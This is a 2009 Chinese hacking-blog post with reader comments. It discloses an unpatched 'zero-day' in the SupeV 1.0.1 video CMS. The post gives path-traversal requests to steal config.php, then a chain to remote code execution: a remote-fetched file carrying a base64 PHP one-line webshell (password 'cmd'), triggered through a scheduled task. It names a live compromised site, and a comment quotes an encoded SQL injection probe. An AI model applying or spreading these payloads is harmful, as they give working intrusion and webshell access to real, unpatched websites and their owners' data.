SupeV 1.0.1 0DAY

2009/02/28 1:55 | 鬼仔 | 技术文章 | 占个座先

# 鬼仔:作者留言纠正文中的错误

漏洞形成,直接以get方式请求
api/test.php?thumb=../config.php&vid=../../1会把config.php复制到根目录下1.jpg
这里写错了,应该是attachments\thumb\1.jpg写入倒了这里,向上跳4级才是根目录,这里只跳了2级,大家分析下代码就知道了,好多人都说利用不了,下面贴一个站出来给大家看
http://video.worlddiy.net/attachments\thumb\1.jpg
上次匆忙文章没写清楚,还望谅解

来源:WEB安全手册

感谢 ′&廢.的投递

大家好,我是无名

今天发布个discuz旗下产品 “视频播客 SupeV 1.0.1” 0day

漏洞文件:api目录下test.php

直接看代码

$str=file_get_contents( $thumb );//首先第18行用file_get_contents() 读取$thumb参数的文件内容,注意这里也可以读远程文件,
$path = ".".getthumb_path( $vid );//第19行获取路径参数 $vid
$opt_big = array(

"targetfile" => $path.".jpg",

"attach" => $attach['attach'],

"ext" => $attach['extension'],

"ratio" => false,

"width" => THUMB_BIG_WIDTH,

"height" => THUMB_BIG_HEIGHT

);  //24行到39行定义$opt_big和$opt_small数组

@sf_copy( $opt_big['targetfile'], $opt_small['targetfile'] );//紧接着第40行就开始copy了,注意看,把$opt_big数组里的targetfile复制到$opt_small数组的targetfile

漏洞形成,直接以get方式请求

api/test.php?thumb=../config.php&vid=../../1

会把config.php复制到根目录下1.jpg

这样就得到了网站的配置文件,phpmyadmin连上去,如果是root连接,直接导出shell,不会的查查对应文章,这里不再叙述。

如果不是root,就注册个账号,连上去把用户的admgid改成1  在sv_members表里

接下来讲后台获取shell,

前面test.php代码file_get_contents() 可以读取远程文件写入到网站目录

api/test.php?thumb=http://你的空间地址/test.txt&vid=../../../../inc/crons/1

写到inc/crons/1.jpg

test.txt内容

<?php fputs(fopen("111.php","w"),base64_decode("PD9ldmFsKCRfUE9TVFtjbWRdKTs/Pg=="));?>

作用是在当前目录生成111.php 内容是LANKER的一句话,密码cmd

为什么写这里,等下就知道了,进入后台,点上方的辅助工具,新增计划任务
200902272335554116

200902272336065542

200902272336151551
提交就执行了inc/crons/1.jpg内容会在根目录下生成111.php内容是LANKER的一句话,密码cmd
成功拿到shell,完了记得删除那个计划任务,不然网站就打不开了,

不会用的联系我
联系qq:57112848
[email protected]
Powered by SupeV 1.0.1  exploit   Found by : 无名

Tags: , , ,

相关日志

楼被抢了 15 层了... 抢座Rss 2.0或者 Trackback

  • 昵称 | 2009-02-28 01:59 | #

    感觉自己这个文章写的很烂…..

    回复该留言
  • 昵称 | 2009-02-28 02:36 | #

    kook1991写的sql_2005_inj 0.1 注入工具不能用了?

    id=dfgaaa%20and%20quotename%28%28Select%200x4A007500730074002E0046006F0072002E00460075006E002E00420079002E006B006F006F006B003100390039003100%29%29%3D0

    抓到的包,解密SQL_Ecode
    0x4A007500730074002E0046006F0072002E00460075006E002E00420079002E006B006F006F006B003100390039003100

    结果竟然是Just.For.Fun.By.kook1991

    我无语了

    回复该留言
  • zafe | 2009-02-28 11:54 | #

    借这个主题说下话

    我通过126订阅了你的文章

    可是到现在也没收到

    加到GOOGLE GROUP也不知道怎么联系

    。。。。。。。。。。。。。。

    (常客)

    回复该留言
  • ghostzgs | 2009-02-28 15:42 | #

    这个漏洞大哥你是怎么看的呀?api/test.php的这个文件是加了密的呀!

    试了几十个没有一个可以成功的!本机测试也没成功!

    回复该留言
    • sExYboy | 2009-02-28 16:05 | #

      我到现在还没DOWN到一个test.php呢,你给个网我看看?
      反而把一个新站的后台密码乱猜出来了….

      回复该留言
    • sExYboy | 2009-02-28 16:12 | #

      厄 加密的 求解

      回复该留言
  • 无名 | 2009-02-28 20:43 | #

    漏洞形成,直接以get方式请求

    api/test.php?thumb=../config.php&vid=../../1会把config.php复制到根目录下1.jpg

    这里写错了,应该是attachments\thumb\1.jpg写入倒了这里,向上跳4级才是根目录,这里只跳了2级,大家分析下代码就知道了,好多人都说利用不了,下面贴一个站出来给大家看

    http://video.worlddiy.net/attachments\thumb\1.jpg

    上次匆忙文章没写清楚,还望谅解,

    回复该留言
    • sExYboy | 2009-03-03 12:29 | #

      充分说明我傻到只会复制粘贴…
      但找到了有两个站根目录有1.jpg
      可能有人之前用过“api/test.php?thumb=../config.php&vid=../../../../1”来测试了。

      回复该留言
  • 无名 | 2009-02-28 23:39 | #

    仔仔,在不在?

    我再发个shopex的0day

    qq:57112848

    回复该留言
  • ?? | 2009-03-02 01:03 | #

    闷!所下的版本全部经zend加密了,因为以前是商业版,文章作者不错呀,两套系统都是卖钱的!被你找到漏洞了

    回复该留言
  • xxx | 2009-03-02 13:18 | #

    zend可以解了

    回复该留言
  • ?? | 2009-03-02 15:10 | #

    没用过那工具,不知解出来的代码可读性怎样?

    回复该留言
  • Spacehacker | 2009-03-02 16:11 | #

    鬼仔~
    无名~
    大家好~对于这个漏洞我测试了,并且写了VB的利用工具~搜索supev利用工具就可以了
    在此感谢无名的0day和鬼仔的blog:)
    谢谢~

    回复该留言
  • gg | 2009-03-03 00:57 | #

    这个漏洞应该怎么补呢?官方好像没有出补丁

    回复该留言

发表评论